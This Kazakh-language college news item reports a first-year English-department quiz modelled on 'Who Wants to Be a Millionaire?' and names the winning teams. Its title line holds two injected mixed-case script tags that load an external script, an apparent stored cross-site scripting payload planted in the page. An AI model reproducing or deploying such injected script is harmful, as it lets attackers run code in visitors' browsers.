«Тіл білгірі – 2022» атты танымдық викторина<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
17.09.2021
Қазақстан Республикасының халықтары Тілдері күніне орай Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжіндегі ағылшын бөлімінің I курс студенттері арасында «Тіл білгірі – 2022» атты танымдық викторина өтті.
Оның негізгі мақсаты – студенттердің сөздік қорын кеңейту, пәнаралық байланысты нақтылау және тіл үйренуге қызығушылықты арттыру. Іс-шараның ақпараттық және ойын-сауық түрі оны топтық оқыту әдістерінің танымал техникасына айналдырады.
Викторина барысында телеарналық «Who Wants to Be a Millionaire?» ойыны ойнатылды. Ережеге сәйкес әр команда басшысын өздері сайлады.
Қатысушылар сұраққа жауап беру кезінде ойланып, кідіріңкіреп қалса, немесе сенімсіз болған жағдайда көмекке қосымша үш мүмкіндік беріледі. Олар «50/50», «Аудиторияға сұрақ қою» және «Досыңызға қоңырау шалу» мүмкіндіктері. Викторина қорытындысына сәйкес «English flowers» тобы жеңімпаз атанды. «Nomad» тобы ІІ орынды еншілесе, «Friends» тобы III орынды иеленді. Жүлдегерлер арнайы дипломдармен марапатталды.
Просмотров: 469